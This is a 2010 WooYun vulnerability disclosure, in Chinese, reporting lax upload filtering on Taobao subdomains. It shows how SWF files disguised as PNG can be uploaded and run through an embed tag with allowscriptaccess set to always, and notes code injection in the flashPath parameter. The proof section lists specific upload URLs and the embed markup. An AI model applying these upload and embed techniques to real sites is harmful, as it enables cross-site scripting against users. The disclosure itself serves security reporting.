当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-01017

漏洞标题:TaoBao.Com几处上传过滤不严

相关厂商:淘宝网

漏洞作者: dbgger

提交时间:2010-12-24 20:01

修复时间:2010-12-29 21:00

公开时间:2010-12-29 21:00

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-12-24: 细节已通知厂商并且等待厂商处理中
2010-12-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

对swf上传没有严格限制.导致可以向主域名内上传swf文件.

详细说明:

swf上传的危害太大.这里不多做解释.另外.
有几处fck.仍然可以上传伪装成png的swf.(不管扩展名是什么.只要加上flash标签,都可以执行flash脚本)

漏洞证明:

http://tianxia.taobao.com/uploadfile/2010/1222/20101222101004357.swf
<embed height="150" width="950" type="application/x-shockwave-flash" src="http://tianxia.taobao.com/uploadfile/2010/1224/20101224072517201.png" quality="high" allowscriptaccess="always" wmode="transparent"/>
http://www.tbtianxia.com/attachment.php?&action=upload&module=phpcms&from=fckeditor&id=2&dosubmit=23&MM_objid=content
http://design.taobao.com/shop/designShop.htm?action=page/TagAction&event_submit_do_upLoadFlashBanner=true&userId=xxxx&flashPath=http://img.uu1001.cn/materials/original/2010-06-14/12-29/11111111111111111111.png&flash_sid=000000000&productId=0000&sign=xxxxxxxxxxxxxxxxxxxxxx&
http://banner.alimama.com/wangpu/apply_design?coop_id=superwangpu&flash_path=http://img.uu1001.cn/materials/original/2010-06-14/12-29/11111111111111111111.png&ad_board_id=111111111&templet_id=11111&person_id=111111&is_ordered=0&is_b2c=0&apt=aboard
这里个人敏感数据我替换掉.怕被社工.
另外,店铺后台这里.flashpath= 可以随便应用.当然是跨不出img.uu1001.cn的.
但是经过测试.flashpath= pic url后面,&结束前 依然可以注入代码.
还有一点,实在搞不懂,为什么店铺后台那里,完全都是get操作.而且基本都是明文.

修复方案:

重画函数.
文件类型严格检测

版权声明:转载请注明来源 dbgger@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2010-12-29 21:00

厂商回复:

漏洞Rank:9 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2010-12-31 01:18 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    很给力 哈哈